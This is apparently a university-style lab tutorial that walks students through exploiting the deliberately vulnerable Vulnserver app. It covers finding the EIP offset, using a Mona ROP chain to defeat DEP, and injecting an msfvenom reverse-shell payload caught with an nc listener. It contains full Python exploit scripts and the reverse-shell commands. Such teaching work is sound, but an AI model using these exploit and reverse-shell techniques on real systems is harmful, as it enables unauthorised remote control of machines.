We will use these tools:
http://sites.google.com/site/lupingreycorner/vulnserver.zip
Or use this alternate download link
Save the "vulnserver.zip" file on your desktop.
On your desktop, right-click vulnserver.zip.
Click "Extract All...", Extract.
A "vulnserver" window opens. Double-click vulnserver. The Vulnserver application opens, as shown below.
In the Search box, type FIREWALL
Click "Windows Firewall".
Turn off the firewall for both private and public networks.
Replace the IP address with the IP address of your Windows machine.
nc 192.168.119.129 9999
You should see a banner saying
"Welcome to Vulnerable Server!",
as shown below.
Type EXIT and press Enter to close your connection to Vulnerable Server.
In Immunity, click File, Open. Navigate to vulnserver.exe and double-click it.
In the Immunity toolbar, click the magenta Run button. Click the Run button a second time.
nano testnr
In the nano window, enter this code,
as shown below.
#!/usr/bin/python
prefix = 'A' * 1900
test = ''
for a in 'abcdefghij':
for b in 'abcdefghij':
test += a + b
padding = 'F' * 3000
attack = prefix + test + padding
attack = attack[:3000]
print attack
Press Ctrl+X, Y, Enter to save the file.
Execute these commands to run it:
chmod a+x testnr
./testnr
You see the attack string: 3000 characters
with a string of lowercase characters
in the middle,
as shown below.
nano findeip
In the nano window, enter this code,
as shown below.
#!/usr/bin/python
import socket
server = '192.168.225.204'
sport = 9999
prefix = 'A' * 1900
test = ''
for a in 'abcdefghij':
for b in 'abcdefghij':
test += a + b
padding = 'F' * 3000
attack = prefix + test + padding
attack = attack[:3000]
s = socket.socket()
connect = s.connect((server, sport))
print s.recv(1024)
s.send(('TRUN .' + attack + '\r\n'))
Press Ctrl+X, Y, Enter to save the file.
Execute these commands to run it:
chmod a+x findeip
./findeip
Your Windows machine should show an
"Access violation" at the bottom of the
Immunity window,
as shown below.
Note these items, outlined in the red in the image below:
Before the EIP, we have these characters:
On the toolbar, click the Run button. Click the Run button a second time.
nano hiteip
In the nano window, enter this code,
as shown below. Adjust the IP address
and the "2006" value as needed for
your system.
#!/usr/bin/python
import socket
server = '192.168.225.204'
sport = 9999
prefix = 'A' * 2006
eip = "BCDE"
padding = 'F' * 3000
attack = prefix + eip + padding
attack = attack[:3000]
s = socket.socket()
connect = s.connect((server, sport))
print s.recv(1024)
s.send(('TRUN .' + attack + '\r\n'))
Press Ctrl+X, Y, Enter to save the file.
Execute these commands to run it:
chmod a+x hiteip
./hiteip
Your Windows machine should show an
"Access violation" at the bottom of the
Immunity window,
as shown below.
Note these items, outlined in the red in the image below:
On the toolbar, click the Run button. Click the Run button a second time.
From the previous project, we know putting 625011af into the EIP will execute JMP ESP and "trampoline" onto the stack.
We'll put a NOP sled and a BRK onto the stack, and attempt to execute it.
On your Kali machine, execute this command:
nano testnx
In the nano window, enter this code,
as shown below. Adjust the IP address
and the "2006" value as needed for
your system.
#!/usr/bin/python
import socket
server = '192.168.225.204'
sport = 9999
prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'
nopsled = '\x90' * 16
brk = '\xcc'
padding = 'F' * 3000
attack = prefix + eip + nopsled + brk + padding
attack = attack[:3000]
s = socket.socket()
connect = s.connect((server, sport))
print s.recv(1024)
s.send(('TRUN .' + attack + '\r\n'))
Press Ctrl+X, Y, Enter to save the file.
Execute these commands to run it:
chmod a+x testnx
./testnx
Look at your Windows machine.
If Immunity shows "INT3
command" at the bottom, as
shown below, the stack allows
code execution.
If it shows an "Access violation" when trying to execute a NOP, the stack does not allow code execution.
On your Windows machine, click Start. Type SYSTEM SETTINGS
In the search results, click "View advanced system settings".
In the "System Properties" box, on the Advanced tab, in the Performance section, click the Settings... button, as shown below.
In the "Performance Options" box, on the "Data Execution Prevention" tab, click the "Turn on DEP for all programs..." button, as shown below.
Click OK.
Click OK again.
Click OK a third time.
Close all programs and restart your Windows machine.
Log in, launch Immunity, and start Vulnserver running inside Immunity again.
./testnx
The lower left corner of the Immunity
window now says "Access violation",
as shown below.
The top left pane shows the current instruction highlighted--it's a NOP. We cannot execute any code on the stack, not even a NOP! This is a powerful security feature, blocking a whole generation of attacks. The goal of this project is to step up our game to defeat DEP.
Press the PrintScrn key to copy the whole desktop to the clipboard.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Paste the image into Paint.
Save the document with the filename "YOUR NAME Proj 11a", replacing "YOUR NAME" with your real name.
To turn off DEP, or to allocate a region of RAM with DEP turned off, we can use any of the following functions: VirtuAlloc(), HeapCreate(), SetProcessDEPPolicy(), NtSetInformationProcess(), VirtualProtect(), or WriteProtectMemory(). It's still a pretty complex process to piece together the "Gadgets" (chunks of machine language code) to accomplish that, but, as usual, the authors of MONA have done the hard work for us :).
In Immunity, at the bottom, there is a white bar. Click in that bar and type this command, followed by the Enter key:
MONA will now hunt through all the DLLs and construct chains of useful gadgets. As you might imagine, this is a big job, so you'll need to wait three minutes or so. During this time, Immunity may freeze and ignore mouse input.!mona rop -m *.dll -cp nonull
When the process is complete, click View, "Log data" to bring the "Log data" window to the front. Maximize it.
The ROP generator found thousands of gadgets, as shown below.
The path to the "stackpivot.txt" file may appear in the MONA output, as outlined in red in the image above. If no path is shown, the file will be in the Immunity program folder, which is "C:\Program Files\Immunity Inc\Immunity Debugger" on 32-bit systems.
On 64-bit Windows 10, the file is in a location like "C:\Users\Student\AppData\Local\VirtualStore\Program Files (x86)\Immunity Inc\Immunity Debugger"
Click Start, Computer. Navigate to that folder. In that folder, double-click the rop_chains.txt file.
This is what we need to do: insert all those values into registers, and then JMP ESP.
That's how Windows API calls work: you load the parameters into the stack and then call the function's address.
Highlight the Python code, right-click it, and click Copy, as shown below.
cp testnx vs-rop2
nano vs-rop2
In the nano window, use the arrow keys on the
keyboard to move the cursor below the
"sport = 9999" line.
Press Shift+Ctrl+V to paste in the Python ROP code.
The result should be as shown below.
As you can see in the image below, there's an indentation problem--the pasted code is indented two spaces in from the rest of the program.
Carefully delete the first two spaces from every line of the ROP code, so your program looks like the image below.
The next step is to add the rop_chain to the attack. It replaces the eip.
Change these two lines:
padding = 'F' * (3000 - 2006 - 4 - 16 - 1)
attack = prefix + eip + nopsled + brk + padding
to this:
padding = 'F' * (3000 - 2006 - len(rop_chain) - 16 - 1)
attack = prefix + rop_chain + nopsled + brk + padding
as shown below.
Add the two libraries "struct" and "sys" to the import statement, as shown below:
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
chmod a+x vs-rop2
Double-click vulnserver to restart it.
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
If Immunity shows a confusing mess of windows, click View, CPU, and maximize the CPU window.
In Immunity, click File, Attach. Click vulnserver and click Attach.
Click the "Run" button.
./vs-rop2
The lower left corner of the Immunity
window now says "INT 3 command",
as shown below.
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue.
Then right-click the highlighted value and click "Follow in Dump".
The lower left pane shows the NOP sled as a series of 90 bytes, followed by a CC byte.
This is working! The ROP Chain turned off DEP, so the code we added to the stack executed.
Right now, the injected code is a NOP sled and an INT 3.
Press the PrintScrn key to copy the whole desktop to the clipboard.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Paste the image into Paint.
Save the document with the filename "YOUR NAME Proj 11b", replacing "YOUR NAME" with your real name.
Troubleshooting
If your exploit fails with an "Access violation", as shown below:add this command to your exploit to remove null characters, as shown below:
rop_chain = rop_chain.replace('\x00', '')
This correction is needed because some ROP chains produced by Mona contain 16-bit values, but the join() operation in Python treats them as 32-bit values, inserting unwanted null bytes into the string.
Don't start Immunity.
ifconfig
Find your Kali machine's IP address
and make a note of it.
On your Kali Linux machine, in a Terminal window, execute the command below.
Replace the IP address with the IP address of your Kali Linux machine.
msfvenom -p windows/shell_reverse_tcp LHOST="192.168.119.130" LPORT=443 EXITFUNC=thread -b '\x00' -f python
This command makes an exploit that will
connect from the Windows target back
to the Kali Linux attacker on port
443 and execute commands from Kali.
The exploit is encoded to avoid null bytes. because '\x00' is a bad character.
Use the mouse to highlight the exploit code, as shown below. Right-click the highlighted code and click Copy.
cp vs-rop2 vs-rop3
nano vs-rop3
Use the down-arrow key to move the cursor
to the end of this line:
sport= 9999
Press Enter twice to insert blank lines.
Then right-click and click Paste, as shown below.
The exploit code appears in the file. The top of your file should now look like this:
Use the arrow keys on the keyboard to scroll down to these lines:
padding = 'F' * (3000 - 2006 - len(rop_chain) - 16 - 1)
attack = prefix + rop_chain + nopsled + brk + padding
Change them to this:
padding = 'F' * (3000 - 2006 - len(rop_chain) - 16 - len(buf))
attack = prefix + rop_chain + nopsled + buf + padding
as shown below.
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
chmod a+x vs-rop3
nc -nlvp 443
This starts a listener on port 443,
to take control of the Windows target.
./vs-rop3
In Kali Linux,
the other Terminal window shows a
Windows prompt, as shown below. You now control
the Windows machine!
Press the PrintScrn key to copy the whole desktop to the clipboard.
YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!
Paste the image into Paint.
Save the document with the filename "YOUR NAME Proj 11c", replacing "YOUR NAME" with your real name.
Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube
Bypassing ASLR and DEP on Windows: The Audio Converter Case
Return-Oriented Programming (ROP) Exploit Example